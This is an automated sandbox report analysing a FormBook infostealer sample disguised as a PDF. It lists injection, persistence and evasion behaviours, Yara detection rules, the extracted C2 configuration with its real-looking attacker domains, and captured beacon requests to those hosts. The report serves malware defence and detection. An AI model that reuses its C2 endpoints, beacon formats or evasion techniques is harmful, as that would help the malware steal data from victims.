Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report INQUIRY 1820521 pdf.exe

Overview

General Information

Sample Name:INQUIRY 1820521 pdf.exe
Analysis ID:385289
MD5:dd3ae15e952c239ae6d87c8374b3b460
SHA1:f8d9daceb3ff1dadabf9051a04bb4356c370fbde
SHA256:513357be2837bb1211c3fe2a32d7e6cdecf75f6cf0da1c2f0d198a38e3cdb759
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • INQUIRY 1820521 pdf.exe (PID: 6928 cmdline: 'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe' MD5: DD3AE15E952C239AE6D87C8374B3B460)
    • schtasks.exe (PID: 7156 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • INQUIRY 1820521 pdf.exe (PID: 2848 cmdline: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe MD5: DD3AE15E952C239AE6D87C8374B3B460)
    • INQUIRY 1820521 pdf.exe (PID: 1848 cmdline: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe MD5: DD3AE15E952C239AE6D87C8374B3B460)
    • INQUIRY 1820521 pdf.exe (PID: 1496 cmdline: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe MD5: DD3AE15E952C239AE6D87C8374B3B460)
    • INQUIRY 1820521 pdf.exe (PID: 1664 cmdline: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe MD5: DD3AE15E952C239AE6D87C8374B3B460)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autochk.exe (PID: 6816 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
        • ipconfig.exe (PID: 6824 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 6852 cmdline: /c del 'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.auggiepaws.com/gnk/"], "decoy": ["fotografialove.com", "drphoenixnguyen.com", "pueblobusinessreview.com", "voteorrall.com", "sailde.com", "active-label.com", "geteless.com", "aperfectbrow.com", "interdictrisk.com", "sakaisays.com", "wyshio.com", "nilantika.com", "landbirdevehicals.com", "vd-bill.com", "ourblingstore.com", "dennites.xyz", "styleformen.online", "adjustedhuman.com", "soglasi.com", "abarroteslacanasta.com", "ylsjsj.com", "carrieroerealtor.com", "2739kingsroad.com", "farmersmeadow.com", "domokoi.com", "lownak.com", "extrarenda.com", "watchcure.com", "yrzx61.com", "boon-bliss.com", "xinghai-nb.com", "perencanaan.net", "queenbeadsandcrafts.com", "capitalcourierltd.online", "yoopadoop.com", "crlspn.com", "sxpyx.com", "rva80s.com", "fuelupllc.com", "mobcitylabs.com", "madebyhidden.com", "bazmemohsin.com", "gosvozvrat-nds.xyz", "rescueranchaz.com", "hhcuerkn.com", "maginames.com", "avkulrestaurant.com", "autofestva.com", "lifeprotectionexpert.com", "shakamaui.com", "demo-berlin.com", "namigweart.com", "thesimpleau.com", "cmchickengt.com", "yourofficespot.com", "areyssg.com", "shanscorp.com", "cozywag.com", "shrikrishnasevasenai.com", "homartist.net", "ferreteriablanco.com", "xczg99999.com", "studyabroadguatemala.com", "britishvapecompany.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        9.2.INQUIRY 1820521 pdf.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          9.2.INQUIRY 1820521 pdf.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Scheduled temp file as task from temp locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe' , ParentImage: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe, ParentProcessId: 6928, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\YAhcdYrYHFkNNf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7085.tmp', ProcessId: 7156

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.auggiepaws.com/gnk/"], "decoy": ["fotografialove.com", "drphoenixnguyen.com", "pueblobusinessreview.com", "voteorrall.com", "sailde.com", "active-label.com", "geteless.com", "aperfectbrow.com", "interdictrisk.com", "sakaisays.com", "wyshio.com", "nilantika.com", "landbirdevehicals.com", "vd-bill.com", "ourblingstore.com", "dennites.xyz", "styleformen.online", "adjustedhuman.com", "soglasi.com", "abarroteslacanasta.com", "ylsjsj.com", "carrieroerealtor.com", "2739kingsroad.com", "farmersmeadow.com", "domokoi.com", "lownak.com", "extrarenda.com", "watchcure.com", "yrzx61.com", "boon-bliss.com", "xinghai-nb.com", "perencanaan.net", "queenbeadsandcrafts.com", "capitalcourierltd.online", "yoopadoop.com", "crlspn.com", "sxpyx.com", "rva80s.com", "fuelupllc.com", "mobcitylabs.com", "madebyhidden.com", "bazmemohsin.com", "gosvozvrat-nds.xyz", "rescueranchaz.com", "hhcuerkn.com", "maginames.com", "avkulrestaurant.com", "autofestva.com", "lifeprotectionexpert.com", "shakamaui.com", "demo-berlin.com", "namigweart.com", "thesimpleau.com", "cmchickengt.com", "yourofficespot.com", "areyssg.com", "shanscorp.com", "cozywag.com", "shrikrishnasevasenai.com", "homartist.net", "ferreteriablanco.com", "xczg99999.com", "studyabroadguatemala.com", "britishvapecompany.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\YAhcdYrYHFkNNf.exeMetadefender: Detection: 13%Perma Link
          Source: C:\Users\user\AppData\Roaming\YAhcdYrYHFkNNf.exeReversingLabs: Detection: 41%
          Multi AV Scanner detection for submitted fileShow sources
          Source: INQUIRY 1820521 pdf.exeVirustotal: Detection: 39%Perma Link
          Source: INQUIRY 1820521 pdf.exeMetadefender: Detection: 13%Perma Link
          Source: INQUIRY 1820521 pdf.exeReversingLabs: Detection: 41%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: INQUIRY 1820521 pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: INQUIRY 1820521 pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: INQUIRY 1820521 pdf.exe, 00000009.00000002.727260572.0000000001430000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: INQUIRY 1820521 pdf.exe, 00000009.00000002.727260572.0000000001430000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.696903670.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: INQUIRY 1820521 pdf.exe, 00000009.00000002.727360700.0000000001510000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.908754281.000000000336F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: INQUIRY 1820521 pdf.exe, ipconfig.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.696903670.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 4x nop then pop esi9_2_004172EA
          Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exeCode function: 4x nop then pop edi9_2_00416C96
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop esi16_2_00A172EA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi16_2_00A16C96

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.auggiepaws.com/gnk/
          Source: global trafficHTTP traffic detected: GET /gnk/?Ezr0pl=DnbLuT&sZvD88=H+m5DnQ6CNrLWDhOr9+GU7qZReU4k+N7/cnPpyZ0AIPp8Rivccl87rPwP+687pRYxKR0 HTTP/1.1Host: www.hhcuerkn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gnk/?sZvD88=SYZO30Rw9/xWTIeSKGPhX7HmTPZweoUXDGzJY+4zU//Zy+/I+iT+Zq6wGsmgWs8tlcqs&Ezr0pl=DnbLuT HTTP/1.1Host: www.mobcitylabs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gnk/?Ezr0pl=DnbLuT&sZvD88=xQkMVUIjVgEDTyCEhmabftVVaeWVPbzi+0a4N1BcO5prH32uPLxq/R2onmpvBIdlFaM0 HTTP/1.1Host: www.xinghai-nb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.185.159.144 198.185.159.144
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: IDCFIDCFrontierIncJP IDCFIDCFrontierIncJP
          Source: C:\Windows\explorer.exeCode function: 10_2_04DFB782 getaddrinfo,setsockopt,recv,10_2_04DFB782
          Source: global trafficHTTP traffic detected: GET /gnk/?Ezr0pl=DnbLuT&sZvD88=H+m5DnQ6CNrLWDhOr9+GU7qZReU4k+N7/cnPpyZ0AIPp8Rivccl87rPwP+687pRYxKR0 HTTP/1.1Host: www.hhcuerkn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gnk/?sZvD88=SYZO30Rw9/xWTIeSKGPhX7HmTPZweoUXDGzJY+4zU//Zy+/I+iT+Zq6wGsmgWs8tlcqs&Ezr0pl=DnbLuT HTTP/1.1Host: www.mobcitylabs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gnk/?Ezr0pl=DnbLuT&sZvD88=xQkMVUIjVgEDTyCEhmabftVVaeWVPbzi+0a4N1BcO5prH32uPLxq/R2onmpvBIdlFaM0 HTTP/1.1Host: www.xinghai-nb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.hhcuerkn.com
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.649744623.0000000008690000.00000004.00000001.sdmpString found in binary or memory: http://en.wikip
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681087935.000000000316C000.00000004.00000001.sdmp, INQUIRY 1820521 pdf.exe, 00000000.00000002.681042988.0000000003121000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681087935.000000000316C000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4
          Source: INQUIRY 1820521 pdf.exeString found in binary or memory: http://weather.gc.ca/astro/seeing_e.html)
          Source: explorer.exe, 0000000A.00000002.909308759.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.649744623.0000000008690000.00000004.00000001.sdmp, INQUIRY 1820521 pdf.exe, 00000000.00000003.648154043.0000000008690000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.648154043.0000000008690000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com11
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.648173441.0000000008675000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com?
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.648173441.0000000008675000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.648173441.0000000008675000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTCV
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.649744623.0000000008690000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.come7
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.648154043.0000000008690000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.648173441.0000000008675000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coms-c
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.651191297.000000000868E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html?
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647449439.00000000086A8000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.c
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn0A
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnCg
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnD
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647365579.00000000086A6000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnP
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647266371.000000000868A000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cna
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnl
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647365579.00000000086A6000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnu-e
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647449439.00000000086A8000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.c~
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr-e
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.krs-cz
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.651699352.0000000008690000.00000004.00000001.sdmpString found in binary or memory: http://www.monotype.5;M
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr?
          Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krim
          Source: explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
